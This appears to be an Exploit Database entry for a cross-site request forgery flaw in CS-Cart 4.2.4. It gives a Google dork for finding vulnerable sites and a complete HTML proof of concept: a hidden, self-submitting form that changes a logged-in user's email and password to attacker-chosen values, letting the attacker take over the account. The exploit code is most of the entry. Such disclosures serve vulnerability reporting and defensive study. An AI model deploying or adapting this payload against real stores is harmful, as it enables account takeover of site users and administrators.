CS-Cart 4.2.4 - Cross-Site Request Forgery

EDB-ID:

36358




Platform:

PHP

Date:

2015-03-11


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: CS-Cart 4.2.4 CSRF
# Google Dork: intext:"© 2004-2015 Simtech"
# Date: March 11, 2015
# Exploit Author: Luis Santana
# Vendor Homepage: http://cs-cart.com
# Software Link: https://www.cs-cart.com/index.php?dispatch=pages.get_trial&page_id=297&edition=ultimate
# Version: 4.2.4
# Tested on: Linux + PHP
# CVE : [if one exists, or other VDB reference]

Standard CSRF, allow you to change a users's password. Fairly lame but I noticed no one had reported this bug yet.

Exploit pasted below and attached.

<html>
<head>
<title>CS-CART CSRF 0day Exploit</title>
</head>
<body>
<!-- Discovered By: Connection
    Exploit By: Connection
    Blacksun Hacker's Club
    irc.blacksunhackers.com #lobby
-->
    <form action="http://<victim>/cscart/profiles-update/?selected_section=general" method="POST" id="CSRF" style="visibility:hidden">
      <input type="hidden" name="user_data[email]" value="hacked@lol.dongs" />
      <input type="hidden" name="user_data[password1]" value="CSRFpass" />
      <input type="hidden" name="user_data[password2]" value="CSRFpass" />
      <input type="hidden" name="user_data[profile_name]" value="Concept" />
      <input type="hidden" name="dispatch[profiles.update]" value="" />
    </form>
<script>
document.getElementById("CSRF").submit();
</script>
  </body>
</html>


Luis Santana - Security+
Administrator - http://hacktalk.net
HackTalk Security - Security From The Underground